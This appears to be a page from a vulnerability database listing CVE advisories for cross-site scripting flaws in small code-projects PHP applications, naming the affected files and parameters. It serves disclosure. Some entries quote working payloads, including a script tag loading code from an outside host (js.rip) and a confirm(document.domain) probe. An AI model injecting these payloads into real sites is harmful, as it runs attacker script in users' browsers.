Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2026-5106
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-4.8||MEDIUM
EPSS-0.19% / 8.82%
||
7 Day CHG~0.00%
Published-30 Mar, 2026 | 04:00
Updated-30 Mar, 2026 | 15:39
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Exam Form Submission update_fst.php cross site scripting

A flaw has been found in code-projects Exam Form Submission 1.0. The impacted element is an unknown function of the file /admin/update_fst.php. Executing a manipulation of the argument sname can lead to cross site scripting. It is possible to launch the attack remotely. The exploit has been published and may be used.

Action-Not Available
Vendor-Source Code & Projects
Product-exam_form_submissionExam Form Submission
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2025-0295
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.3||MEDIUM
EPSS-0.45% / 35.66%
||
7 Day CHG~0.00%
Published-07 Jan, 2025 | 14:00
Updated-27 Sep, 2025 | 00:25
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Online Book Shop booklist.php cross site scripting

A vulnerability was found in code-projects Online Book Shop 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /booklist.php?subcatid=1. The manipulation of the argument subcatnm leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

Action-Not Available
Vendor-Source Code & Projects
Product-online_book_shopOnline Book Shop
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2024-11246
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.3||MEDIUM
EPSS-0.51% / 39.51%
||
7 Day CHG~0.00%
Published-15 Nov, 2024 | 16:00
Updated-20 Nov, 2024 | 14:35
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Farmacia adicionar-cliente.php cross site scripting

A vulnerability, which was classified as problematic, was found in code-projects Farmacia 1.0. Affected is an unknown function of the file /adicionar-cliente.php. The manipulation of the argument nome/cpf/dataNascimento leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory mentions the parameter "nome" to be affected. But further inspection indicates that other parameters might be affected as well.

Action-Not Available
Vendor-anishaSource Code & Projects
Product-farmaciaFarmaciafarmacia
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2025-0961
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.1||MEDIUM
EPSS-0.38% / 29.27%
||
7 Day CHG~0.00%
Published-01 Feb, 2025 | 22:31
Updated-28 May, 2025 | 17:17
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Job Recruitment load_job-details.php cross site scripting

A vulnerability, which was classified as problematic, has been found in code-projects Job Recruitment 1.0. Affected by this issue is some unknown functionality of the file /_parse/load_job-details.php. The manipulation of the argument business_stream_name/company_website_url leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

Action-Not Available
Vendor-anishaSource Code & Projects
Product-job_recruitmentJob Recruitment
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2024-11078
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.3||MEDIUM
EPSS-0.40% / 31.88%
||
7 Day CHG~0.00%
Published-11 Nov, 2024 | 19:31
Updated-30 Sep, 2025 | 14:26
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Job Recruitment register.php cross site scripting

A vulnerability has been found in code-projects Job Recruitment 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /register.php. The manipulation of the argument e/role leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

Action-Not Available
Vendor-anishaSource Code & Projects
Product-job_recruitmentJob Recruitmentjob_recruitment
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2024-10142
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.3||MEDIUM
EPSS-0.42% / 33.89%
||
7 Day CHG~0.00%
Published-19 Oct, 2024 | 17:00
Updated-22 Oct, 2024 | 18:11
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Blood Bank System viewrequest.php cross site scripting

A vulnerability has been found in code-projects Blood Bank System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /viewrequest.php. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

Action-Not Available
Vendor-Source Code & Projects
Product-blood_bank_systemBlood Bank Systemblood_bank_system
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVE-2024-10198
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.1||MEDIUM
EPSS-0.40% / 31.89%
||
7 Day CHG~0.00%
Published-21 Oct, 2024 | 01:00
Updated-22 Oct, 2024 | 15:39
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Pharmacy Management System Manage Customer Page manage_customer.php cross site scripting

A vulnerability was found in code-projects Pharmacy Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /manage_customer.php of the component Manage Customer Page. The manipulation of the argument suppliers_name/address leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory mentions contradicting files to be affected. Other parameters might be affected as well.

Action-Not Available
Vendor-Source Code & Projects
Product-pharmacy_managementPharmacy Management Systempharmacy_management_system
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVE-2024-9084
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.3||MEDIUM
EPSS-0.40% / 31.88%
||
7 Day CHG~0.00%
Published-22 Sep, 2024 | 09:00
Updated-26 Sep, 2024 | 15:29
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Blood Bank System bbms.php cross site scripting

A vulnerability classified as problematic was found in code-projects Blood Bank System 1.0. This vulnerability affects unknown code of the file bbms.php. The manipulation of the argument fullname/age/bloodgroup/city/phno/gender as part of String leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

Action-Not Available
Vendor-Source Code & Projects
Product-blood_bank_systemBlood Bank Systemblood_bank_system
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVE-2024-10199
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.1||MEDIUM
EPSS-0.40% / 31.89%
||
7 Day CHG~0.00%
Published-21 Oct, 2024 | 01:31
Updated-22 Oct, 2024 | 15:40
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Pharmacy Management System Manage Medicines Page manage_medicine.php cross site scripting

A vulnerability was found in code-projects Pharmacy Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /manage_medicine.php of the component Manage Medicines Page. The manipulation of the argument name/address/doctor_address/suppliers_name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory mentions contradicting files to be affected.

Action-Not Available
Vendor-Source Code & Projects
Product-pharmacy_managementPharmacy Management Systempharmacy_management_system
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVE-2024-0722
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-3.5||LOW
EPSS-0.45% / 35.82%
||
7 Day CHG~0.00%
Published-19 Jan, 2024 | 16:31
Updated-17 Jun, 2025 | 21:19
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Social Networking Site Message Page message.php cross site scripting

A vulnerability was found in code-projects Social Networking Site 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file message.php of the component Message Page. The manipulation of the argument Story leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251546 is the identifier assigned to this vulnerability.

Action-Not Available
Vendor-Source Code & Projects
Product-social_networking_siteSocial Networking Site
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVE-2023-7143
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-2.4||LOW
EPSS-0.54% / 41.03%
||
7 Day CHG~0.00%
Published-29 Dec, 2023 | 00:31
Updated-29 Oct, 2025 | 17:48
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Client Details System regester.php cross site scripting

A vulnerability was found in code-projects Client Details System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /admin/regester.php. The manipulation of the argument fname/lname/email/contact leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249146 is the identifier assigned to this vulnerability.

Action-Not Available
Vendor-Fabian RosSource Code & Projects
Product-client_details_systemClient Details System
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVE-2023-7135
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-2.4||LOW
EPSS-0.49% / 38.33%
||
7 Day CHG~0.00%
Published-28 Dec, 2023 | 20:31
Updated-02 Aug, 2024 | 08:50
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Record Management System Offices offices.php cross site scripting

A vulnerability classified as problematic has been found in code-projects Record Management System 1.0. Affected is an unknown function of the file /main/offices.php of the component Offices Handler. The manipulation of the argument officename with the input "><script src="https://js.rip/b23tmbxf49"></script> leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249138 is the identifier assigned to this vulnerability.

Action-Not Available
Vendor-Source Code & Projects
Product-record_management_systemRecord Management System
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVE-2023-7056
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-2.4||LOW
EPSS-0.49% / 38.33%
||
7 Day CHG~0.00%
Published-22 Dec, 2023 | 03:00
Updated-09 Sep, 2024 | 20:48
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Faculty Management System subjects.php cross site scripting

A vulnerability classified as problematic was found in code-projects Faculty Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/pages/subjects.php. The manipulation of the argument Description/Units leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248743.

Action-Not Available
Vendor-carmelogarciaSource Code & Projects
Product-faculty_management_systemFaculty Management System
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVE-2023-7132
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-3.5||LOW
EPSS-0.61% / 44.71%
||
7 Day CHG~0.00%
Published-28 Dec, 2023 | 17:00
Updated-02 Aug, 2024 | 08:50
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Intern Membership Management System User Registration cross site scripting

A vulnerability was found in code-projects Intern Membership Management System 2.0. It has been classified as problematic. This affects an unknown part of the file /user_registration/ of the component User Registration. The manipulation of the argument userName/firstName/lastName/userEmail with the input "><ScRiPt>confirm(document.domain)</ScRiPt>h0la leads to cross site scripting. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249135.

Action-Not Available
Vendor-carmelogarciaSource Code & Projects
Product-intern_membership_management_systemIntern Membership Management System
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVE-2023-7136
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-2.4||LOW
EPSS-0.49% / 38.33%
||
7 Day CHG~0.00%
Published-28 Dec, 2023 | 21:00
Updated-02 Aug, 2024 | 08:50
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Record Management System Document Type doctype.php cross site scripting

A vulnerability classified as problematic was found in code-projects Record Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /main/doctype.php of the component Document Type Handler. The manipulation of the argument docname with the input "><script src="https://js.rip/b23tmbxf49"></script> leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249139.

Action-Not Available
Vendor-Source Code & Projects
Product-record_management_systemRecord Management System
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVE-2024-9805
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.3||MEDIUM
EPSS-0.40% / 31.88%
||
7 Day CHG~0.00%
Published-10 Oct, 2024 | 18:00
Updated-15 Oct, 2024 | 19:18
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Blood Bank System campsdetails.php cross site scripting

A vulnerability was found in code-projects Blood Bank System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /admin/campsdetails.php. The manipulation of the argument hospital/address/city/contact leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory only mentions the parameter "hospital".

Action-Not Available
Vendor-Source Code & Projects
Product-blood_bank_systemBlood Bank Systemblood_bank_system
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVE-2026-4578
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-4.8||MEDIUM
EPSS-0.27% / 18.17%
||
7 Day CHG~0.00%
Published-23 Mar, 2026 | 07:36
Updated-24 Apr, 2026 | 16:32
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Exam Form Submission update_s3.php cross site scripting

A vulnerability was determined in code-projects Exam Form Submission 1.0. The impacted element is an unknown function of the file /admin/update_s3.php. Executing a manipulation of the argument sname can lead to cross site scripting. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized.

Action-Not Available
Vendor-Source Code & Projects
Product-Exam Form Submission
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2023-46580
Matching Score-10
Assigner-MITRE Corporation
ShareView Details
Matching Score-10
Assigner-MITRE Corporation
CVSS Score-5.4||MEDIUM
EPSS-0.51% / 39.38%
||
7 Day CHG~0.00%
Published-14 Nov, 2023 | 00:00
Updated-03 Sep, 2024 | 14:57
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available

Cross-Site Scripting (XSS) vulnerability in Inventory Management V1.0 allows attackers to execute arbitrary code via the pname parameter of the editProduct.php component.

Action-Not Available
Vendor-n/aSource Code & Projects
Product-inventory_managementn/a
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVE-2025-6347
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-4.8||MEDIUM
EPSS-0.28% / 19.76%
||
7 Day CHG~0.00%
Published-20 Jun, 2025 | 15:31
Updated-11 Jul, 2025 | 12:24
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Responsive Blog pageViewMembers.php cross site scripting

A vulnerability was found in code-projects Responsive Blog 1.0/1.12.4/3.3.4. It has been declared as problematic. This vulnerability affects unknown code of the file /responsive/resblog/blogadmin/admin/pageViewMembers.php. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

Action-Not Available
Vendor-Source Code & ProjectsFabian Ros
Product-responsive_blog_siteResponsive Blog
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2025-6353
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.1||MEDIUM
EPSS-0.29% / 20.20%
||
7 Day CHG~0.00%
Published-20 Jun, 2025 | 16:31
Updated-11 Jul, 2025 | 12:20
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Responsive Blog search.php cross site scripting

A vulnerability classified as problematic was found in code-projects Responsive Blog 1.0. Affected by this vulnerability is an unknown functionality of the file /search.php. The manipulation of the argument keyword leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

Action-Not Available
Vendor-Source Code & ProjectsFabian Ros
Product-responsive_blog_siteResponsive Blog
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2026-6184
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-4.8||MEDIUM
EPSS-0.30% / 21.74%
||
7 Day CHG~0.00%
Published-13 Apr, 2026 | 15:00
Updated-22 Apr, 2026 | 20:23
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Simple Content Management System welcome.php cross site scripting

A weakness has been identified in code-projects Simple Content Management System 1.0. This affects an unknown part of the file /web/admin/welcome.php. Executing a manipulation of the argument News Title can lead to cross site scripting. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks.

Action-Not Available
Vendor-Source Code & Projects
Product-Simple Content Management System
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2026-6003
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-4.8||MEDIUM
EPSS-0.20% / 10.10%
||
7 Day CHG~0.00%
Published-10 Apr, 2026 | 02:15
Updated-24 Apr, 2026 | 18:01
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Simple IT Discussion Forum user.php cross site scripting

A security vulnerability has been detected in code-projects Simple IT Discussion Forum 1.0. This issue affects some unknown processing of the file /admin/user.php. Such manipulation of the argument fname leads to cross site scripting. The attack may be performed from remote. The exploit has been disclosed publicly and may be used.

Action-Not Available
Vendor-Source Code & Projects
Product-Simple IT Discussion Forum
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2026-5647
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-4.8||MEDIUM
EPSS-0.21% / 10.62%
||
7 Day CHG~0.00%
Published-06 Apr, 2026 | 10:45
Updated-27 Apr, 2026 | 19:04
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Online Shoe Store Add Product admin_feature.php cross site scripting

A vulnerability was detected in code-projects Online Shoe Store 1.0. This affects an unknown part of the file /admin/admin_feature.php of the component Add Product Page. The manipulation of the argument product_name results in cross site scripting. The attack may be launched remotely. The exploit is now public and may be used.

Action-Not Available
Vendor-Source Code & Projects
Product-Online Shoe Store
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2026-4909
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-4.8||MEDIUM
EPSS-0.28% / 19.53%
||
7 Day CHG~0.00%
Published-27 Mar, 2026 | 02:25
Updated-24 Apr, 2026 | 16:35
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Exam Form Submission update_s7.php cross site scripting

A weakness has been identified in code-projects Exam Form Submission 1.0. This impacts an unknown function of the file /admin/update_s7.php. This manipulation of the argument sname causes cross site scripting. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks.

Action-Not Available
Vendor-Source Code & Projects
Product-Exam Form Submission
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2025-5765
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.1||MEDIUM
EPSS-0.25% / 15.67%
||
7 Day CHG~0.00%
Published-06 Jun, 2025 | 12:31
Updated-10 Jun, 2025 | 19:29
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Laundry System edit_laundry.php cross site scripting

A vulnerability was found in code-projects Laundry System 1.0. It has been classified as problematic. This affects an unknown part of the file /data/edit_laundry.php. The manipulation of the argument Customer leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

Action-Not Available
Vendor-Source Code & Projects
Product-simple_laundry_systemLaundry System
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2025-5764
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.1||MEDIUM
EPSS-0.25% / 15.67%
||
7 Day CHG~0.00%
Published-06 Jun, 2025 | 12:31
Updated-10 Jun, 2025 | 19:29
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Laundry System insert_laundry.php cross site scripting

A vulnerability was found in code-projects Laundry System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /data/insert_laundry.php. The manipulation of the argument Customer leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

Action-Not Available
Vendor-Source Code & Projects
Product-simple_laundry_systemLaundry System
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2025-5796
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.1||MEDIUM
EPSS-0.23% / 14.03%
||
7 Day CHG~0.00%
Published-06 Jun, 2025 | 19:00
Updated-12 Jun, 2025 | 16:19
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Laundry System edit_type.php cross site scripting

A vulnerability has been found in code-projects Laundry System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /data/edit_type.php. The manipulation of the argument Type leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

Action-Not Available
Vendor-Source Code & Projects
Product-simple_laundry_systemLaundry System
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
  • Previous
  • 1
  • 2
  • 3
  • ...
  • 219
  • 220
  • Next
Details not found